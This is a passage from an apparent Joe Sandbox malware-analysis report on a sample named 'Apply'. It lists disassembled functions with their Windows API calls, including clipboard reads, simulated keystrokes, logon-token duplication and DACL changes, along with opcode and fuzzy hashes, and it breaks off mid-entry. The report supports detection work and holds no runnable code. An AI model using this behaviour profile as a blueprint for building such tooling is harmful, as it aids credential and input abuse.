Instruction Fuzzy Hash: 3AE06DB1216A29AAE7313A6A9D04B5E7658FB42FB0F160121AC15E60D4EB60DE0183E2

Function 0085554C Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6de52bc216e257055782dd03a01faa4692ca69451ff013693b66346043dde3e8
Instruction ID: f403cb3319e768189a526bdbffaa1837db33f2ca7c5fa0a1cdca92da6fcc0eca
Opcode Fuzzy Hash: 6de52bc216e257055782dd03a01faa4692ca69451ff013693b66346043dde3e8
Instruction Fuzzy Hash: 5DF039B1105B51CFDB35AF64D4A0912BBF5FF1432A3288A7EE5DAC6620D731A848DF40

Function 008556AA Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 008556C8

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: c1e6ecd98d5466ae11fb2f40a92f4ea408688d1151f6508a8c6824d50e7e42d0
Instruction ID: c1dce43d80ee33d8d3418ff1607789b8bef64312e672a7210eb2ffc039dd953b
Opcode Fuzzy Hash: c1e6ecd98d5466ae11fb2f40a92f4ea408688d1151f6508a8c6824d50e7e42d0
Instruction Fuzzy Hash: EDF0587140020DFFDF05CF90C941EAE7BB9FB18318F208484F9148A111D336EA21ABA1

Function 00852F14 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00852F70

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: ac64b89da46a586af259d3ea48832fb34792841c16aa1004490a3fe8b256280b
Instruction ID: 89fcd047cb706d16d6d4214086ca418f280a54185fa95321f1f9f03e9741505d
Opcode Fuzzy Hash: ac64b89da46a586af259d3ea48832fb34792841c16aa1004490a3fe8b256280b
Instruction Fuzzy Hash: 75F0A770914344AFDB62DF24EC457967BFCB70170CF0400E9A588D6181DB744789CF41

Function 0085318A Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 008531A9

Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 270218bb6c1dd265161cb45210b331a873868819e1e6dcf476c36894f467fc9c
Instruction ID: 88e8c4fce4798593fbc9b9abc2cf321005a307eb9e5b5dbcf3206f4d11ead042
Opcode Fuzzy Hash: 270218bb6c1dd265161cb45210b331a873868819e1e6dcf476c36894f467fc9c
Instruction Fuzzy Hash: 42E0C272A002246BCB21A39CDC06FEAB7EDEFC8790F0440B1FD09D7248DA60ED848691

Function 00852825 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00853989: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00853A5A

Part of subcall function 0085DCC0: GetInputState.USER32 ref: 0085DDA7

SetCurrentDirectoryW.KERNEL32(?), ref: 00852853

Part of subcall function 00852F14: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00852F70

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 9fd8e88a59233111ac418bee0e5d6ddc1de728d96787062479306e8f49571347
Instruction ID: 9d5eb88b7b9acd4ba6daa20ca2de25b4af4ff6a7f4bb782db71bad45448f28ca
Opcode Fuzzy Hash: 9fd8e88a59233111ac418bee0e5d6ddc1de728d96787062479306e8f49571347
Instruction Fuzzy Hash: 8DE0866170434517CB18FB78B85196DEBA4FBD1356F40153EF902C6162DE25498D8353

Function 00856903 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,008532C7), ref: 00856923

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 0270e2959aa39f962a351a427b416f2684125bbdbd49b9dbb50f25456d2cf87c
Instruction ID: 25c5e19c33ff795661186e2cac873d9cb6320bc0e0f6bfe535b50017974cdb89
Opcode Fuzzy Hash: 0270e2959aa39f962a351a427b416f2684125bbdbd49b9dbb50f25456d2cf87c
Instruction Fuzzy Hash: D7E09275400B05CEC3314F1AE804412FAE4FED13623204A2ED4E583660E3B0589ACB90

Function 008906ED Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00890A57,?,?,00000000,?,00890A57,00000000,0000000C), ref: 0089070A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4b4632f91c8c463dd3bc050e38532b8c429adbaad06ca31efa9b6bf3df2c2cc6
Instruction ID: c558b3bea8c0507ba4ed757fb557e85dce290fb8377fc8477d9c23b62fcc0623
Opcode Fuzzy Hash: 4b4632f91c8c463dd3bc050e38532b8c429adbaad06ca31efa9b6bf3df2c2cc6
Instruction Fuzzy Hash: 05D06C3200024DBFDF028F84DD46EDA3BAAFB48714F014000BE1856020C732E821AB91

Function 008BE7DA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,008BD57A), ref: 008BE7DB

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 34f63a967fff82d02191510ed4a458e9eea25320dd4adc79162ad553059657d8
Instruction ID: d1dedd4da3f75219bb05863a77d7e215d7df3acb667dc197e2d52fc15fbcec77
Opcode Fuzzy Hash: 34f63a967fff82d02191510ed4a458e9eea25320dd4adc79162ad553059657d8
Instruction Fuzzy Hash: 09B0923800060009AD280A385A488D9230AB8433A97D81B80F67EC92F18B39980BE614

Function 00851727 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00851736

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: ec2aea48c0683d9238742a2956aeae5b8ddb4bd4c986c34754453f7ee9b46717
Instruction ID: 555de5f4293638f1dc74684f0d9032f5f739f706f04b10ec84ab8054c3a2d1cc
Opcode Fuzzy Hash: ec2aea48c0683d9238742a2956aeae5b8ddb4bd4c986c34754453f7ee9b46717
Instruction Fuzzy Hash: 91C09232394304AFE6309B80BC8BF14B765A318B00F00C402BA0D5A1F383B66429FE20

Function 008C6376 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 008BD98E: FindFirstFileW.KERNEL32(?,?), ref: 008BDA05
Part of subcall function 008BD98E: DeleteFileW.KERNEL32(?,?,?,?), ref: 008BDA55
Part of subcall function 008BD98E: FindNextFileW.KERNEL32(00000000,00000010), ref: 008BDA66
Part of subcall function 008BD98E: FindClose.KERNEL32(00000000), ref: 008BDA7D

GetLastError.KERNEL32 ref: 008C6398

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 36ccd6ea8244571347118fc440d312f1c44c8f3a0f604d95e284be21a9710b15
Instruction ID: 24fb388571f255ab009806b5196a3ec958a1dc5f70a42a752bf3cdbacf4c5206
Opcode Fuzzy Hash: 36ccd6ea8244571347118fc440d312f1c44c8f3a0f604d95e284be21a9710b15
Instruction Fuzzy Hash: 4BF08C322102109FCB10EF5DD851B6AB7E5FF48B61F048059F90ADB352EB70BC458B92

Non-executed Functions

Function 0086F64C Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131threadkeyboardwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0086F656
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0086F673
IsIconic.USER32(00000000), ref: 0086F67C
SetForegroundWindow.USER32(00000000), ref: 0086F68E
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0086F6A4
GetCurrentThreadId.KERNEL32 ref: 0086F6AB
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0086F6B7
AttachThreadInput.USER32(?,00000000,00000001), ref: 0086F6C8
AttachThreadInput.USER32(?,00000000,00000001), ref: 0086F6D0
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0086F6D8
SetForegroundWindow.USER32(00000000), ref: 0086F6DB
MapVirtualKeyW.USER32(00000012,00000000), ref: 0086F6F4
keybd_event.USER32(00000012,00000000), ref: 0086F6FF
MapVirtualKeyW.USER32(00000012,00000000), ref: 0086F709
keybd_event.USER32(00000012,00000000), ref: 0086F70E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0086F717
keybd_event.USER32(00000012,00000000), ref: 0086F71C
MapVirtualKeyW.USER32(00000012,00000000), ref: 0086F726
keybd_event.USER32(00000012,00000000), ref: 0086F72B
SetForegroundWindow.USER32(00000000), ref: 0086F72E
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0086F74C
AttachThreadInput.USER32(?,00000000,00000000), ref: 0086F754
AttachThreadInput.USER32(00000000,000000FF,00000000), ref: 0086F75C

Strings

Shell_TrayWnd, xrefs: 0086F66E

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconic
String ID: Shell_TrayWnd
API String ID: 1155518417-2988720461
Opcode ID: 436985a0339e5bf5b002dcb03cb39d49290159931476ddd1eeb44ecee26af924
Instruction ID: 003891d884d4d56b8c8e23d58847ebf212d225630c1d568c321439bc075d63ea
Opcode Fuzzy Hash: 436985a0339e5bf5b002dcb03cb39d49290159931476ddd1eeb44ecee26af924
Instruction Fuzzy Hash: D3313271A40358BAEB206BB59C8AF7F7E6CFB44B54F110065FB05FB1D1D6B19D00AAA0

Function 008B18E3 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 008B1DA5: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008B1DEF
Part of subcall function 008B1DA5: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008B1E1C
Part of subcall function 008B1DA5: GetLastError.KERNEL32 ref: 008B1E2C

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 008B1968
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 008B198A
CloseHandle.KERNEL32(?), ref: 008B199B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008B19B3
GetProcessWindowStation.USER32 ref: 008B19CC
SetProcessWindowStation.USER32(00000000), ref: 008B19D6
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008B19F2

Part of subcall function 008B17A1: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008B18DE), ref: 008B17B6
Part of subcall function 008B17A1: CloseHandle.KERNEL32(?,?,008B18DE), ref: 008B17CB

Strings

winsta0, xrefs: 008B19AE
default, xrefs: 008B19ED
, xrefs: 008B193C

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 2915ef2dc515c8ee9c7c24775c46924c6aaada9eee075ce735ca6c3aa8e64903
Instruction ID: b77e1979d19dc4f703114dbcb964f8e363563663e17c3e52b2318bcef884ecd3
Opcode Fuzzy Hash: 2915ef2dc515c8ee9c7c24775c46924c6aaada9eee075ce735ca6c3aa8e64903
Instruction Fuzzy Hash: 49817871900249AFDF219FA4DC99FEE7BB8FF04314F544029F914EA2A0E7318A59CB60

Function 008B1244 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008B17DB: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008B17F6
Part of subcall function 008B17DB: GetLastError.KERNEL32(?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1802
Part of subcall function 008B17DB: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1811
Part of subcall function 008B17DB: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1818
Part of subcall function 008B17DB: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008B182F

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008B12AE
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008B12E2
GetLengthSid.ADVAPI32(?), ref: 008B12F9
GetAce.ADVAPI32(?,00000000,?), ref: 008B1333
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008B134F
GetLengthSid.ADVAPI32(?), ref: 008B1366
GetProcessHeap.KERNEL32(00000008,00000008), ref: 008B136E
HeapAlloc.KERNEL32(00000000), ref: 008B1375
GetLengthSid.ADVAPI32(?,00000008,?), ref: 008B1396
CopySid.ADVAPI32(00000000), ref: 008B139D
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008B13CC
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008B13EE
SetUserObjectSecurity.USER32(?,00000004,?), ref: 008B1400
GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1427
HeapFree.KERNEL32(00000000), ref: 008B142E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1437
HeapFree.KERNEL32(00000000), ref: 008B143E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1447
HeapFree.KERNEL32(00000000), ref: 008B144E
GetProcessHeap.KERNEL32(00000000,?), ref: 008B145A
HeapFree.KERNEL32(00000000), ref: 008B1461

Part of subcall function 008B1875: GetProcessHeap.KERNEL32(00000008,008B1293,?,00000000,?,008B1293,?), ref: 008B1883
Part of subcall function 008B1875: HeapAlloc.KERNEL32(00000000,?,00000000,?,008B1293,?), ref: 008B188A
Part of subcall function 008B1875: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,008B1293,?), ref: 008B1899

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 55f497d4a61b5367f6ab8db1880dc595733a61d6639ee677bd9aa4cb690de623
Instruction ID: f01c6436903b7f9e21329098079553a4ce563b635eba4e206d57a094cc071711
Opcode Fuzzy Hash: 55f497d4a61b5367f6ab8db1880dc595733a61d6639ee677bd9aa4cb690de623
Instruction Fuzzy Hash: BE714AB2900209ABDF10DFA5DC88BEEBBB9FF04350F548125E915EF291D7719A05CBA0

Function 008CF286 Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(008EDC1C), ref: 008CF2B0
IsClipboardFormatAvailable.USER32(0000000D), ref: 008CF2BE
GetClipboardData.USER32(0000000D), ref: 008CF2CA
CloseClipboard.USER32 ref: 008CF2D6
GlobalLock.KERNEL32(00000000), ref: 008CF30E
CloseClipboard.USER32 ref: 008CF318
GlobalUnlock.KERNEL32(00000000,00000000), ref: 008CF343
IsClipboardFormatAvailable.USER32(00000001), ref: 008CF350
GetClipboardData.USER32(00000001), ref: 008CF358
GlobalLock.KERNEL32(00000000), ref: 008CF369
GlobalUnlock.KERNEL32(00000000,?), ref: 008CF3A9
IsClipboardFormatAvailable.USER32(0000000F), ref: 008CF3BF
GetClipboardData.USER32(0000000F), ref: 008CF3CB
GlobalLock.KERNEL32(00000000), ref: 008CF3DC
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 008CF3FE
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 008CF41B
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 008CF459
GlobalUnlock.KERNEL32(00000000,?,?), ref: 008CF47A
CountClipboardFormats.USER32 ref: 008CF49B
CloseClipboard.USER32 ref: 008CF4E0

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 09f298c1dd2828bd589487ad3377fe477648f818c75badfa3f1aae51afcbb243
Instruction ID: f94d9e51b94dd32ea11107a9ec5f663a84b082e16a97b69edaff67b10f086545
Opcode Fuzzy Hash: 09f298c1dd2828bd589487ad3377fe477648f818c75badfa3f1aae51afcbb243
Instruction Fuzzy Hash: 5C617B30204341AFE314EB24D884F2ABBB5FF84715F14456DF956CB2A2DB71E949CBA2

Function 008C70FE Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 008C712D
FindClose.KERNEL32(00000000), ref: 008C7181
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008C71BD
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008C71E4

Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE

FileTimeToSystemTime.KERNEL32(?,?), ref: 008C7221
FileTimeToSystemTime.KERNEL32(?,?), ref: 008C724E

Strings

%02d, xrefs: 008C736F, 008C7379, 008C73C9, 008C7419, 008C7469, 008C74B9
%03d, xrefs: 008C7511
%4d, xrefs: 008C7320
%4d%02d%02d%02d%02d%02d, xrefs: 008C72D9
%4d%02d%02d%02d%02d%02d%03d, xrefs: 008C72A1

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: b659e023a2ad9a4f20dea18066351cf518087cca9d97349401191ace6d07643c
Instruction ID: 61562cd090891199450740c6435f9e68fa49a406dff360a05e2a0bfd436bafaa
Opcode Fuzzy Hash: b659e023a2ad9a4f20dea18066351cf518087cca9d97349401191ace6d07643c
Instruction Fuzzy Hash: C3D13E72508340AFC714DBA8D885EABB7E8FF88705F44491DF985C6292EB74D948CB63

Function 008C448D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008C44AF
_wcslen.LIBCMT ref: 008C44DC
CreateDirectoryW.KERNEL32(?,00000000), ref: 008C450C
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 008C452D
RemoveDirectoryW.KERNEL32(?), ref: 008C453D
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 008C45C4
CloseHandle.KERNEL32(00000000), ref: 008C45CF
CloseHandle.KERNEL32(00000000), ref: 008C45DA

Strings

